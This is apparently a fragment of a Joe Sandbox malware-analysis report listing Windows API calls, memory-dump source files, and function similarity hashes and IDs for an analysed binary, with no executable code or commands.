                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00FB35E1
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 00FB3612
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: E&eb
                                                                              • API String ID: 237503144-175690455
                                                                              • Opcode ID: f3f710c82bda30bb8014b66846693d917231787496c7f377f847b2346ec10a61
                                                                              • Instruction ID: ae782a2ef50e4c866d581f62f94542a71cebc30d2430651003a1b7b99b74d0c7
                                                                              • Opcode Fuzzy Hash: f3f710c82bda30bb8014b66846693d917231787496c7f377f847b2346ec10a61
                                                                              • Instruction Fuzzy Hash: B26174B1640B005FD328CF78CC82BA7B3E6EB45324F148A2DD4A6C77D1E774A9458B51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 00FD1DB3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: m%s$!EJK
                                                                              • API String ID: 237503144-2691780584
                                                                              • Opcode ID: 7d6425c1f4a8401919099e1daee6bdc0c9ed9ed6b9f877bbee6e2e6765203442
                                                                              • Instruction ID: ebe704c46123fb7a90e9c9df11293569809c2c0517b6b464475f72d88d70862a
                                                                              • Opcode Fuzzy Hash: 7d6425c1f4a8401919099e1daee6bdc0c9ed9ed6b9f877bbee6e2e6765203442
                                                                              • Instruction Fuzzy Hash: 102186714083949FD314CF15D891B5BBBF4FB86348F110A1DF9A1AB280D775AA05CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00FFDEA6: __getptd.LIBCMT ref: 00FFDEAC
                                                                                • Part of subcall function 00FFDEA6: __getptd.LIBCMT ref: 00FFDEBC
                                                                              • __getptd.LIBCMT ref: 0100285A
                                                                                • Part of subcall function 00FFED41: __amsg_exit.LIBCMT ref: 00FFED51
                                                                              • __getptd.LIBCMT ref: 01002868
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd$__amsg_exit
                                                                              • String ID: csm
                                                                              • API String ID: 1969926928-1018135373
                                                                              • Opcode ID: 19a090d337b5289cb2aa2f64d74c49aadee50cee4b888bae0250ae30ba76a082
                                                                              • Instruction ID: eb854e7c24e8402adf2684cae17b08a850fe99ad869ace5513357ecbae9ae0f4
                                                                              • Opcode Fuzzy Hash: 19a090d337b5289cb2aa2f64d74c49aadee50cee4b888bae0250ae30ba76a082
                                                                              • Instruction Fuzzy Hash: A601D138802205DBEF7A9F28C8487BDB7F5AF10311F2804AEF4805A6E1CB359784DB60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%